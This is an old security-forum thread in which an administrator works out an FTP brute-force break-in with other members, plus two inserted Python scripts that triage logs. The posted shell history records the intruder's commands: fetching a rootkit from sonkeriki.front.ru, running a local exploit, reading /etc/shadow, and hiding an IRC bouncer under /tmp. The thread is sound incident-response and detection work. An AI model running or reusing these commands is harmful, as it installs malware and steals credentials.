-
November 17th, 2004, 06:21 AM
#1
Senior Member
Suspicious log
Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:11 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:12 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] New connection from 210.195.30.50
Nov 17 08:54:13 hosting pure-ftpd[13737]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:14 hosting pure-ftpd[13724]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:15 hosting pure-ftpd[13730]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:16 hosting pure-ftpd[13737]: (?@210.195.30.50) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:50 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:55 hosting pure-ftpd[13929]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:55 hosting pure-ftpd[13910]: (?@210.195.30.36) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:56 hosting pure-ftpd[13936]: (?@210.195.30.36) [INFO] New connection from 210.195.30.36
Nov 17 08:54:57 hosting pure-ftpd[13936]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
N
----
Nov 17 09:39:50 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] New connection from 210.195.36.227
Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
Nov 17 09:39:54 hosting pure-ftpd[25356]: (rootbeer@210.195.36.227) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 09:44:53 hosting named[2053]: client 218.111.217.111#2671: update 'lanfar.com.my/IN' denied
Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] New connection from 127.0.0.1
Nov 17 09:45:07 hosting pure-ftpd[26695]: (?@127.0.0.1) [INFO] Logout - CPU time spent: 0.000 seconds.
Nov 17 09:50:12 hosting named[2053]: client 218.111.217.111#2827: update 'lanfar.com.my/IN' denied
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] New connection from 210.186.130.187
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/str00351117095203.zipx uploaded (144892 bytes, 3.11KB/sec)
Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] File successfully renamed or moved: [str00351117095203.zipx]->[str00351117095203.zip]
Nov 17 09:52:07 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [INFO] Logout - CPU time spent: 0.010 seconds.
Based on the log above.. can we say that someone is spoofing an IP address and trying to log on to the box using the rootbeer user id? There is a lot of this type of log.. for the entire day.. What should I do? What is he trying to do?
-
November 17th, 2004, 10:49 AM
#2
Do you have a registered user for the box called Rootbeer? If yes, well, it looks like a remote login.... by pharting around with proxies..
If you don't have a user called Rootbeer... YOU DO NOW.... in other words, rooted... Now I will sit back, watch and learn..
cheers
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
November 17th, 2004, 11:47 AM
#3
grab the zipfile......
Sit back and watch, grab anything else they put there. Popping a packet sniffer like Ethereal on the box would be nice too..... Just watch for outbound connections. When they start, mess with them for a while then kill the hack....
Don't SYN us.... We'll SYN you.....
"A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides
-
November 17th, 2004, 01:31 PM
#4
Und3ertak3r already noted it. You seem to have a user named rootbeer. If you didn't create it, you're screwed. If it is an account you've created, it probably has a simple password. Someone may have brute-forced that password (those are the "Authentication failed" log entries). By using different proxies (the source addresses in your logs) your attacker hopes you won't notice it.
Because it's a TCP connection you can probably rule out TCP/IP spoofing. Spoofing a fully blown TCP connection is next to impossible to do over the Internet. Heck, it's hard enough to do in a lab environment.
I'd definitely check out that zipfile. It may contain some tools your attacker plans on using.
This might give you an edge, so it'll be easier to guess what your attacker will do next.
Oliver's Law:
Experience is something you don't get until just after you need it.
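The pattern described in the two posts above (many "Authentication failed" lines for one account from several source addresses, then a successful login from yet another address, then an upload) can be pulled out of a pure-ftpd syslog automatically. The following is an added example, not code from the thread; the log lines embedded in it are constructed after the ones in the first post.

```python
import re
from collections import defaultdict

# Constructed sample, modelled on the pure-ftpd lines in the original post.
SAMPLE_LOG = """\
Nov 17 08:54:11 hosting pure-ftpd[13724]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:12 hosting pure-ftpd[13730]: (?@210.195.30.50) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:52 hosting pure-ftpd[13910]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 08:54:56 hosting pure-ftpd[13929]: (?@210.195.30.36) [WARNING] Authentication failed for user [rootbeer]
Nov 17 09:39:51 hosting pure-ftpd[25356]: (?@210.195.36.227) [INFO] rootbeer is now logged in
Nov 17 09:51:12 hosting pure-ftpd[28557]: (?@210.186.130.187) [INFO] rootbeer is now logged in
Nov 17 09:52:05 hosting pure-ftpd[28557]: (rootbeer@210.186.130.187) [NOTICE] /usr/home/rootbeer//in/x.zipx uploaded (144892 bytes, 3.11KB/sec)
"""

# pure-ftpd prefixes every message with "(user@ip)"; the user is "?" until authenticated.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]{8}) \S+ pure-ftpd\[\d+\]: "
    r"\((?P<authuser>[^@]+)@(?P<ip>[^)]+)\) \[(?P<level>\w+)\] (?P<msg>.*)$"
)
FAIL_RE = re.compile(r"Authentication failed for user \[(?P<user>[^\]]+)\]")
LOGIN_RE = re.compile(r"^(?P<user>\S+) is now logged in$")
UPLOAD_RE = re.compile(r"^(?P<path>\S+) uploaded \((?P<bytes>\d+) bytes")

def analyse(log_text, fail_threshold=3):
    """Per-user summary: failures per source IP, successful logins, uploads, and a
    'suspicious' flag when a brute-forced account later logs in from a new address."""
    users = defaultdict(lambda: {"fails": defaultdict(int), "logins": [], "uploads": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a pure-ftpd line (named, cron, ...): ignore
        ip, msg = m["ip"], m["msg"]
        if f := FAIL_RE.search(msg):
            users[f["user"]]["fails"][ip] += 1
        elif l := LOGIN_RE.match(msg):
            users[l["user"]]["logins"].append(ip)
        elif u := UPLOAD_RE.match(msg):
            users[m["authuser"]]["uploads"].append((u["path"], int(u["bytes"])))
    report = {}
    for user, d in users.items():
        total_fails = sum(d["fails"].values())
        report[user] = {
            "failures": total_fails,
            "distinct_fail_sources": len(d["fails"]),
            "login_sources": d["logins"],
            "uploads": d["uploads"],
            # failures from several proxies, then a login from one that never failed
            "suspicious": total_fails >= fail_threshold
                          and any(ip not in d["fails"] for ip in d["logins"]),
        }
    return report
```

A legitimate user who mistypes a password a few times normally logs in from the same address afterwards, which is why the flag requires a login from an address that never produced a failure.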
-
November 17th, 2004, 03:26 PM
#5
Senior Member
Has anyone tried this?
wget sonkeriki.front.ru/sk.tar.gz
-
November 18th, 2004, 10:14 AM
#6
Junior Member
Just did.
This excerpt of the contents should say it all:
Hello, dear friend
I have two news for you. Bad one and the bad one:
First, it seems that someone installed rootkit
on your system...
Second, is the fact that I can't execute (errno=%d)
original /sbin/init binary!
And reason why I am telling you this is
that I can't live without this file. It's just
kinda of symbiosis, so, boot from clean floppy,
mount root fs and repair /sbin/init from backup.
(and install me again, if you like :P)
Best regards,
your rootkit .. SoNkErIkI Say`s Have a nice day!
Taken from the sk file in the tar.
"I love fools and mistakes, I'm always making them" (Charles Darwin)
-
November 18th, 2004, 11:46 AM
#7
Penguin, did you find a reference to that sk.tar.gz file on your system?
If you did, you're definitely 0wn3d
Take the system off-line, backup your data and reinstall everything from original media. Yes, this means nuking your system, there's no way to tell what else "they" may have touched without doing some serious forensic analysis... And don't forget to update your system before putting it online again.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
November 18th, 2004, 05:48 PM
#8
Senior Member
How do I find the file?
I can't find the file..
It seems like it was deleted..
This is the .bash_history file:
w
ping www.yahoo.com
cd /tmp
cd /var/tmp
ls -al
cd /tmp
ftp sonkeriki.front.ru
bye
ls -al
cd /tmp
tar xvf pt.tar
./pt
./pt
id
id
id
id
id
id
id
id
./pt
./pt
./pt
./pt
./pt
./pt
./pt
./pt
w
who
rm -rf pt pt.tar
ls -al
id
ps x
w
w
pwd
cd .X11-unix/
ls -al
ftp sonkeriki.front.ru
tar xzvf p.tar.gz
PATH=.:$PATH
sh
cd ..
exit
bash
clear
exit
w
cd /tmp
cd .X11-unix/
ls -al
rm -rf p.tar.gz
ls -al
mv psybnc .X11-unix
ls -al
cd .X11-unix
make
a
a
pwd
ls -al
mv psybnc sh
ls -al
hostname
sh
clear
exit
w
cat /etc/host
cat /etc/hosts
ifconfig
/sbin/ifconfig -a
uptime
ping www.yahoo.com
cd /tmp
ping www.yahoo.com
clear
exit
hostname
vhost
vhosts
ifconfig
/sbin/ifconfig -a
cat /etc/hosts
id
ls -al
cd /home
ls -al
cat /etc/shadow
cd /tmp
ls -al
su
wget sonkeriki.front.ru/sk.tar.gz
ls -al
tar xzvf sk.tar.gz
rm -rf download.php?URL=sonkeriki.front.ru%2Fsk.tar.gz
ls -al
cd /tmp
ls -al
What do you all think?
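A shell history like the one above can be triaged mechanically: single commands that are indicators on their own (fetching from a remote host, working in a hidden directory under /tmp, prepending "." to PATH, renaming a tool to "sh", reading /etc/shadow, su, deleting the tools afterwards) plus the sequence that matters most here, a "./something" run immediately followed by "id" to check whether the uid changed. This is an added example, not code from the thread; the history excerpt in it is constructed from the posted one, and the rule names are my own.

```python
import re

# Constructed excerpt following the .bash_history posted above (not the full file).
SAMPLE_HISTORY = """\
cd /tmp
ftp sonkeriki.front.ru
tar xvf pt.tar
./pt
id
./pt
id
rm -rf pt pt.tar
cd .X11-unix/
PATH=.:$PATH
mv psybnc sh
cat /etc/shadow
su
wget sonkeriki.front.ru/sk.tar.gz
"""

# Single-command indicators; each pattern occurs in the posted history.
RULES = [
    ("remote fetch",         re.compile(r"^(wget|curl|ftp|fetch)\s+\S")),
    ("hidden dir in tmp",    re.compile(r"^cd\s+(/tmp/|/var/tmp/)?\.\S")),
    ("PATH hijack",          re.compile(r"^PATH=\.")),
    ("binary masquerade",    re.compile(r"^mv\s+\S+\s+(sh|bash|login|init)\s*$")),
    ("credential file read", re.compile(r"^cat\s+/etc/shadow\b")),
    ("privilege switch",     re.compile(r"^su\b")),
    ("tool cleanup",         re.compile(r"^rm\s+-rf?\s")),
]

def triage(history_text, window=2):
    """Return (line, command, tag) for every suspicious command. Besides the
    single-command rules, a './x' followed within `window` commands by 'id' is
    tagged as a local exploit attempt: run something, then check the uid."""
    cmds = [c.strip() for c in history_text.splitlines() if c.strip()]
    hits = []
    for i, cmd in enumerate(cmds):
        for tag, rx in RULES:
            if rx.search(cmd):
                hits.append((i + 1, cmd, tag))
        if cmd.startswith("./") and "id" in cmds[i + 1:i + 1 + window]:
            hits.append((i + 1, cmd, "local exploit attempt (./x then id)"))
    return hits

def summarise(hits):
    """Count hits per tag so a long history can be judged at a glance."""
    counts = {}
    for _, _, tag in hits:
        counts[tag] = counts.get(tag, 0) + 1
    return counts
```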
-
November 18th, 2004, 05:55 PM
#9
Senior Member
Originally posted here by recca
Just did.
This excerpt of the contents should say it all:
Taken from the sk file in the tar.
Hey.. how did you do it? I cannot gunzip the file after downloading it..
-
November 18th, 2004, 07:06 PM
#10
Junior Member
I'm just curious how this person gained "root" level access via your FTP site. Was some form of buffer-overflow exploited in addition to the FTP account brute-forcing? Also.. I assume you HAD to have had an account named "rootbeer" to be cracked by password grinding.
For knowledge's sake, I'd suggest you determine if your FTP server (based on its revision) is susceptible to buffer overflow exploits, as I'm not aware of any native FTP based methods of gaining root.
And finally - based on your .bash_history, it looks like somebody's staging some great files to play with on your site and is definitely looking at setting up some sort of server-based process (hence all the pinging to yahoo.com and reviewing of your network config (ifconfig)).
Good luck!